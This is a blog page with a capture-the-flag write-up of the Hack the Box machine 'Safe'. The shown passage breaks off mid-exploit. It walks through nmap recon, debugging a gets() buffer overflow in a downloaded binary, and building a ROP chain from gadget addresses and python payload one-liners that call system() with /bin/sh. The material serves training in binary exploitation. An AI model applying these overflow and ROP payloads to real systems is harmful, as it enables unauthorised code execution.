<!DOCTYPE html>





<html lang="en" 
  
    mode="dark"
  
 >

  <!--
  The Head
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="theme" content="Chirpy v2.5.1">

  <title>Hack the Box - Safe | Quantumly Confused
  </title>

  <meta name="description" content="HTB Safe machine walkthrough. A contentious box from HTB requiring a custom developed ROP (return-oriented programming) exploit tied into cracking a KeepPass database.">
  <meta name="keywords" content="hackthebox,htb,pentest,redteam,writeup,walkthrough,buffer overflow,keeppass,jtr,john-the-ripper,rop,safe">
  <link rel="canonical" href="https://blog.quantumlyconfused.com/hack-the-box/2019/10/26/htb-machine-safe/" />

  <meta name="twitter:title" content="HacktheBox Writeup - Safe - QuantumlyConfused">
  <meta name="twitter:description" content="HTB Safe machine walkthrough. A contentious box from HTB requiring a custom developed ROP (return-oriented programming) exploit tied into cracking...">
  <meta name="twitter:image" content="https://blog.quantumlyconfused.com/assets/htb-safe/infocard.PNG">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@_PatrickDowning" />
  <meta name="twitter:creator" content="@_PatrickDowning" />

  <meta property="og:title" content="HacktheBox Writeup - Safe - QuantumlyConfused">
  <meta property="og:description" content="HTB Safe machine walkthrough. A contentious box from HTB requiring a custom developed ROP (return-oriented programming) exploit tied into cracking...">
  <meta property="og:image" content="https://blog.quantumlyconfused.com/assets/htb-safe/infocard.PNG">
  <meta property="og:url" content="https://blog.quantumlyconfused.com/hack-the-box/2019/10/26/htb-machine-safe/">

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://www.favicon-generator.org/
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2019 Cotes Chung
  Published under the MIT license
-->



<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">

<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png">

<link rel="icon" type="image/png" sizes="192x192"  href="/assets/img/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
    <link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials">
    <link rel="dns-prefetch" href="https://www.google-analytics.com">

    <link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous">
    <link rel="dns-prefetch" href="https://www.googletagmanager.com">

    

    <!-- Global site tag (gtag.js) - Google Analytics-->

<meta name="google-site-verification" content="4x5Z0Ong7lBlu0f5GVm2D_Fma9DU4A_GvFaBJA5lOOo" />
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-148947358-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  
  gtag('js', new Date());
  gtag('config', 'UA-148947358-1');
</script>



  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
    integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">

  <!-- Font Awesome -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"
    integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ="
    crossorigin="anonymous">

  <!--
  CSS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <link rel="preload" as="style" href="/assets/css/post.css">
  <link rel="stylesheet" href="/assets/css/post.css">

  

    <link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css">
    <link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" />

  




  <!-- JavaScripts -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  <script async
    src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>

  <!--
  JS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <script async src="/assets/js/post.min.js"></script>

  





  <!-- PWA -->
  <script defer src="/app.js"></script>



  <script data-ad-client="ca-pub-1349331648978464" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

  <!-- Cookie Consent by https://www.PrivacyPolicies.com -->
  <script type="text/javascript" src="//www.privacypolicies.com/public/cookie-consent/4.0.0/cookie-consent.js"></script>
  <script type="text/javascript">
  document.addEventListener('DOMContentLoaded', function () {
  cookieconsent.run({"notice_banner_type":"headline","consent_type":"express","palette":"dark","language":"en","website_name":"https://blog.quantumlyconfused.com","website_privacy_policy_url":"https://blog.quantumlyconfused.com/tabs/disclaimer/"});
  });
  </script>
  <noscript><a href="https://www.PrivacyPolicies.com/cookie-consent/">Cookie Consent by PrivacyPolicies.com</a></noscript>

</head>


  <body data-spy="scroll" data-target="#toc">

    <div id="sidebar" class="d-flex flex-column">
      <!--
  The Side Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="nav-wrapper">
  <div id="profile-wrapper" class="d-flex flex-column">
    <div id="avatar" class="d-flex justify-content-center">
      <a href="/" alt="avatar">
        
        
        
        <img src="/assets/img/sample/padraignix.png" alt="avatar" onerror="this.style.display='none'">
      </a>
    </div>

    <div class="profile-text mt-3">
      <div class="site-title">
        <a href="/">Quantumly Confused</a>
      </div>
      <div class="site-subtitle font-italic">Quantum, InfoSec, Crypto, CTFs, and related adventures</div>
    </div>
  </div>

  <ul class="nav flex-column">
  

  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/projects/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-puzzle-piece ml-xl-3 mr-xl-3 unloaded"></i>
        <span>PROJECTS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
  

  </ul> <!-- ul.nav.flex-column -->

</div><!-- #nav-wrapper -->

<div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4">

  

  
    

    
    <a href="https://twitter.com/_PatrickDowning" aria-label="twitter" target="_blank" rel="noopener">
      <i class="fab fa-twitter"></i>
    </a>
    
  
    

    
    <a href="https://www.linkedin.com/in/downingpatrick/" aria-label="linkedin" target="_blank" rel="noopener">
      <i class="fab fa-linkedin"></i>
    </a>
    
  
    

    
    <a href="https://www.reddit.com/user/Padraignix" aria-label="reddit" target="_blank" rel="noopener">
      <i class="fab fa-reddit-alien"></i>
    </a>
    
  
    

    
    <a href="https://github.com/padraignix" aria-label="github" target="_blank" rel="noopener">
      <i class="fab fa-github-alt"></i>
    </a>
    
  
    

    
    <a href="https://www.twitch.tv/padraignix" aria-label="hackthebox" target="_blank" rel="noopener">
      <i class="fab fa-twitch"></i>
    </a>
    
  
    

    
    <a href="/feed.xml" aria-label="rss" >
      <i class="fas fa-rss"></i>
    </a>
    
  

</div>

    </div>

    <!--
  The Top Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->
<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">
      
        
        <span>
          <a href="/">
            Posts
          </a>
        </span>
        
      

      
        <span>Hack the Box - Safe</span>
      

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
    Post
    </div>

    <i id="search-trigger" ></i>
    <!--<span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>-->
    <span id="search-cancel" >Cancel</span>
    <!--<i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>-->
    </span>
    <span id="search-cancel" ></span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        <!--
  Refactor the HTML structure.
-->



<!--
  Suroundding the markdown table with '<div class="table-wrapper">. and '</div>'
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->


<div class="row">

  <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">

    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

      <h1 data-toc-skip>Hack the Box - Safe</h1>

      <div class="post-meta text-muted d-flex flex-column">
        <!-- Published date and author -->
        <div>
          Posted
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago "
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Sat, Oct 26, 2019, 10:00 AM -0400"
  >

  
  

  
    Oct 26, 2019
  

  <i class="unloaded">2019-10-26T10:00:00-04:00</i>

</span>
          by
          <span class="author">
          
            Patrick Downing
          
          </span>
        </div>

        <!-- lastmod -->
          
          
        
          
          
        
          
          
        
          
          
            
            

        
        <div>
          Updated
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago lastmod"
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Sat, Nov 14, 2020,  4:36 PM -0500"
  >

  
  

  
    Nov 14, 2020
  

  <i class="unloaded">2020-11-14T16:36:16-05:00</i>

</span>
        </div>
        

        <!-- page views -->
        

      </div> <!-- .post-meta -->

      <div class="post-content">

        

        <!-- Using lozad. See: <https://github.com/ApoorvSaxena/lozad.js#usage> -->
        
          
          <h1>Introduction</h1>
<p>
<img width="75%" height="75%" src="/assets/htb-safe/infocard.PNG" />
</p>

<p>Marked as easy, Safe is a contentious box from HTB requiring a custom developed ROP (return-oriented programming) exploit tied into cracking a KeepPass database. Personally I absolutely loved the box from the perspective of digging into ROP and practicing the techniques. The box itself however was quite barren and could have definitely used a bit more "makeup" to get away from the CTF-like vibes. If you have a base in <a href="/hack-the-box/2019/10/12/htb-machine-writeup/">binary exploitation</a> but haven't dived into ROP exploits before this is a great box to make that jump. The <a href="/hack-the-box/2019/10/19/htb-machine-ellingson/">Ellingson</a> box was then a good next-step as it took the same ROP concepts and required use of ret2lib which wasn't required here.</p>

<h1>Initial Recon</h1>

<p>Per normal kicking off the recon phase with an <code>nmap</code> query.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Safe# nmap <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-p1-</span> <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">--open</span> <span class="nt">-v</span> 10.10.10.147
Starting Nmap 7.70 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2019-10-13 14:27 EDT
...
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de <span class="o">(</span>RSA<span class="o">)</span>
|   256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp   open  http    Apache httpd 2.4.25 <span class="o">((</span>Debian<span class="o">))</span>
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 <span class="o">(</span>Debian<span class="o">)</span>
|_http-title: Apache2 Debian Default Page: It works
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP: 
|     14:28:48 up 1:13, 0 <span class="nb">users</span>, load average: 0.01, 0.03, 0.05
|   DNSVersionBindReqTCP: 
|     14:28:43 up 1:13, 0 <span class="nb">users</span>, load average: 0.02, 0.03, 0.06
|   GenericLines: 
|     14:28:32 up 1:12, 0 <span class="nb">users</span>, load average: 0.02, 0.03, 0.06
|     What <span class="k">do </span>you want me to <span class="nb">echo </span>back?
|   GetRequest: 
|     14:28:38 up 1:12, 0 <span class="nb">users</span>, load average: 0.02, 0.03, 0.06
|     What <span class="k">do </span>you want me to <span class="nb">echo </span>back? GET / HTTP/1.0
|   HTTPOptions: 
|     14:28:38 up 1:12, 0 <span class="nb">users</span>, load average: 0.02, 0.03, 0.06
|     What <span class="k">do </span>you want me to <span class="nb">echo </span>back? OPTIONS / HTTP/1.0
|   Help: 
|     14:28:53 up 1:13, 0 <span class="nb">users</span>, load average: 0.01, 0.02, 0.05
|     What <span class="k">do </span>you want me to <span class="nb">echo </span>back? HELP
|   Kerberos, SSLSessionReq, TLSSessionReq: 
|     14:28:53 up 1:13, 0 <span class="nb">users</span>, load average: 0.01, 0.02, 0.05
|     What <span class="k">do </span>you want me to <span class="nb">echo </span>back?
|   NULL: 
|     14:28:32 up 1:12, 0 <span class="nb">users</span>, load average: 0.02, 0.03, 0.06
|   RPCCheck: 
|     14:28:38 up 1:12, 0 <span class="nb">users</span>, load average: 0.02, 0.03, 0.06
|   RTSPRequest: 
|     14:28:38 up 1:12, 0 <span class="nb">users</span>, load average: 0.02, 0.03, 0.06
|_    What <span class="k">do </span>you want me to <span class="nb">echo </span>back? OPTIONS / RTSP/1.0
1 service unrecognized despite returning data.</code></pre></figure>

<p>Already this seems interesting with port 1337. What happens when we go to the page manually</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/echo-back.PNG" />
</p>

<p>Hum...that output seems suspciously like the output of <code>uptime</code>. So this should mean that at somepoint during the call it's executing the command and returning the result. Let's see if we can fuzz this quick and dirty.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/myapp-fuzz.PNG" />
</p>

<p>So when passing 120 characters to the call it still prints out the uptime result, however seemingly the execution flow afterwards breaks.</p>

<p>I spent a bit of time attempting different inputs however all I was able to glean was the difference with &gt;=120 characters. Decided to go back to the drawing board and look at port 80. Looks like just a default apache page - nothing special here. Or is there...</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/myapp.PNG" />
</p>

<p>Sneaky... I went to <code>http://10.10.10.147/myapp</code> and grabed a copy of the myapp program. Great now it's definitely looking more like a RE/Binex based challenge.</p>

<h1>User exploitation</h1>

<p>First thing I do is open up Ghidra to try and go through the source code decompile. The program itself seems quite simplistic.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/ghidra-main-decom.PNG" />
</p>

<p>Now that we understand the logic flow let's replicate the overflow with a debugger attached and see what we can find. While we're at it let's also take a quick look at the security settings of the app.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/gdb-checksec-simple.PNG" />
</p>
<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/gdb-a-fuzz.PNG" />
</p>

<p>With NX set we know we won't be able to push our own code to the Stack and have it executed so we will need to look for a different avenue. Continuing with the execution flow we can see that we completely overwrite <code>$rbp</code>. A quick look online gives a good breakdown on various register purposes - <i><code>%rbp</code> points to the current stack frame, <code>%rsp</code> points to the top of the stack</i>. With our ability to overwrite <code>%rbp</code> we should be able to leverage that to hijack execution flow. Let's get a bit more details using pattern create.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/gdb-pattern-fuzz.PNG" />
</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="nv">$rsp</span>   : 0x00007fffffffe188  →  <span class="s2">"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af[...]"</span>
<span class="nv">$rbp</span>   : 0x3964413864413764 <span class="o">(</span><span class="s2">"d7Ad8Ad9"</span>?<span class="o">)</span>

root@kali:~/Desktop/HTB/Safe# /usr/bin/msf-pattern_offset <span class="nt">-q</span> 0x3964413864413764
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exact match at offset 112

root@kali:~/Desktop/HTB/Safe# /usr/bin/msf-pattern_offset <span class="nt">-q</span> Ae0A
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exact match at offset 120</code></pre></figure>

<p>Ok so the first 112 bytes are garbage that fills up the <code>gets()</code> array, the next 8 bytes will overwrite <code>$rbp</code> and from 120 on looks like we're overwriting the stack.</p>

<h3>Enter the ROP</h3>

<p>Firstly, what is ROP? Good old wikipedia to the rescue.</p>

<blockquote>
In this technique, an attacker gains control of the call stack to hijack program control flow and then executes carefully chosen machine instruction sequences that are already present in the machine's memory, called "gadgets". Each gadget typically ends in a return instruction and is located in a subroutine within the existing program and/or shared library code. Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks.
</blockquote>

<p>Essentially we are trying to pass memory addresses to the stack that when sequentially executed will perform actions we want. At the end of the execution flow of <code>myapp</code> there is a leave/ret combo.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">     0x4011ab &lt;main+76&gt;        leave  
     0x4011ac &lt;main+77&gt;        ret   </code></pre></figure>

<p>Looking deeper into code theory I found that with <a href="https://www.felixcloutier.com/x86/leave">leave</a> - <i>"...the old frame pointer is then popped from the stack..."</i> and <a href="https://www.felixcloutier.com/x86/ret">ret</a> - <i>"Transfers program control to a return address located on the top of the stack"</i>. Since we have control of the stack we should be able leverage this to load the stack with function addresses we want to execute. Thankfully there is a <code>system()</code> call directly in the main function. We won't have to use any advanced techniques, we only need to reference the address of the function directly - <code>0x0040116e</code>. Padding the address appropriately for 64 bit, let's give it a shot and check in the debugger.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'print "A"*120 + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"C"*100'</span> <span class="o">&gt;</span> <span class="n">specific5</span><span class="p">.</span><span class="n">txt</span></code></pre></figure>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/gdb-system-rop2.PNG" />
</p>

<p>Excellent. We see the <code>system()</code> call at the top of the stack and our breakpoint at myapp's <code>return 0;</code> show's the execution flow is being redirected to <code>system()</code> instead of exiting. Now this in itself wasn't particularly useful. I wanted to see how <code>/usr/bin/uptime</code> was being passed to the call. I set up a breakpoint on the initial call and compared between this one and my forced call at the end.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">Initial system call:
system@plt <span class="o">(</span>
   <span class="nv">$rdi</span> <span class="o">=</span> 0x0000000000402008 → <span class="s2">"/usr/bin/uptime"</span>,
   <span class="nv">$rsi</span> <span class="o">=</span> 0x00007fffffffe268 → 0x00007fffffffe549 → <span class="s2">"/root/Desktop/HTB/Safe/myapp"</span>
<span class="o">)</span>

My system call:
system@plt <span class="o">(</span>
   <span class="nv">$rdi</span> <span class="o">=</span> 0x0000000000000000,
   <span class="nv">$rsi</span> <span class="o">=</span> 0x0000000000405260 → <span class="s2">"What do you want me to echo back? AAAAAAAAAAAAAAAA[...]"</span>
<span class="o">)</span></code></pre></figure>

<p>Alright, so I need to find a gadget that can overwrite <code>$rdi</code> to something of my choosing. Going back to the ghidra decompile I found a handy function built in to the app. Despite <code>test()</code> never being called, it does provide us the appropriate gadgets necessary to update <code>$rdi</code>.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="k">**************************************************************</span>
<span class="k">*</span>                          FUNCTION                          <span class="k">*</span>
<span class="k">**************************************************************</span>
undefined <span class="nb">test</span><span class="o">()</span>
     undefined         AL:1           &lt;RETURN&gt;
     <span class="nb">test                                            </span>XREF[3]:     Entry Point<span class="o">(</span><span class="k">*</span><span class="o">)</span>, 00402060, 
                                                                                  00402108<span class="o">(</span><span class="k">*</span><span class="o">)</span>  
00401152 55              PUSH       RBP
00401153 48 89 e5        MOV        RBP,RSP
00401156 48 89 e7        MOV        RDI,RSP
00401159 41 ff e5        JMP        R13</code></pre></figure>

<p>Now there is one extra complication here. While <code>test()</code>moves the value of <code>$rsp</code> into <code>$rdi</code> like we need, it then jumps to the value of <code>$r13</code> which is currently/will be empty at the moment. We need to chain this call with another gadget that also pops an address off the stack (which we control) into <code>$r13</code>. GDB has a nice ropper function for this exact purpose.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/gdb-ropper.PNG" />
</p>

<p>Ok so there are three pops as part of this gadget. We need to take that into consideration and include fluff to ensure we get the right address into <code>r13</code> and the rest our stack isn't adversely affected. Thinking about this logically we want to form the exploit as follows:</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="s">"A"</span><span class="o">*</span><span class="mi">120</span> <span class="o">+</span>                             <span class="c1">#fluff until the start of stack
</span><span class="s">"</span><span class="se">\x06\x12\x40\x00\x00\x00\x00\x00</span><span class="s">"</span> <span class="o">+</span>  <span class="c1"># pop r13; pop r14; pop r15; ret;
</span><span class="s">"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">"</span> <span class="o">+</span>  <span class="c1">#system() - r13
</span><span class="s">"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">"</span> <span class="o">+</span>  <span class="c1">#system() - r14
</span><span class="s">"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">"</span> <span class="o">+</span>  <span class="c1">#system() - r15
</span><span class="s">"</span><span class="se">\x52\x11\x40\x00\x00\x00\x00\x00</span><span class="s">"</span> <span class="o">+</span>  <span class="c1"># test()
</span><span class="s">"/bin/sh "</span> <span class="o">+</span>                          <span class="c1">#command we want to execute 
</span><span class="s">"C"</span><span class="o">*</span><span class="mi">100</span>                               <span class="c1">#rest of fluff</span></code></pre></figure>

<p>Ok, let's put it together and see how it goes:</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'print"A"*120 + 
"</span><span class="se">\x06\x12\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x52\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"/bin/sh " + "C"*100'</span> <span class="o">&gt;</span> <span class="n">custom5</span><span class="p">.</span><span class="n">txt</span></code></pre></figure>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/custom5.PNG" />
</p>

<p>Wait a minute, that doesn't look right... It seems when attempting to execute it is pulling the first 8 characters before the stack in addition to what is on the stack. Essentially bytes 112-120, or what we overwrite into <code>$rbp</code>. Ok we can work with that. Let's adjust the exploit.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'print "A"*112 + "/bin/sh " + 
"</span><span class="se">\x06\x12\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x52\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"/bin/sh " + "C"*100'</span> <span class="o">&gt;</span> <span class="n">custom6</span><span class="p">.</span><span class="n">txt</span></code></pre></figure>

<p>This also didn't work. But knowing where to look we took a look at our <code>system()</code> call and see what <code>$rdi</code> looks like.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">system@plt <span class="o">(</span>
   <span class="nv">$rdi</span> <span class="o">=</span> 0x00007fffffffe1a8 → <span class="s2">"/bin/sh /bin/sh CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC[...]"</span>,
   <span class="nv">$rsi</span> <span class="o">=</span> 0x0000000000405260 → <span class="s2">"What do you want me to echo back? AAAAAAAAAAAAAAAA[...]"</span>
<span class="o">)</span></code></pre></figure>

<p>Ok, we are calling <code>/bin/sh</code> properly. Now we need to replace that second instance with the command we want to run and also terminate the command to avoid chaining the rest of the stack. I forgot to terminate on the next attempt, however that irrelevant as I managed to get my test command executed! At this point I was over the moon.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'print "A"*112 + "/bin/sh;" + 
"</span><span class="se">\x06\x12\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
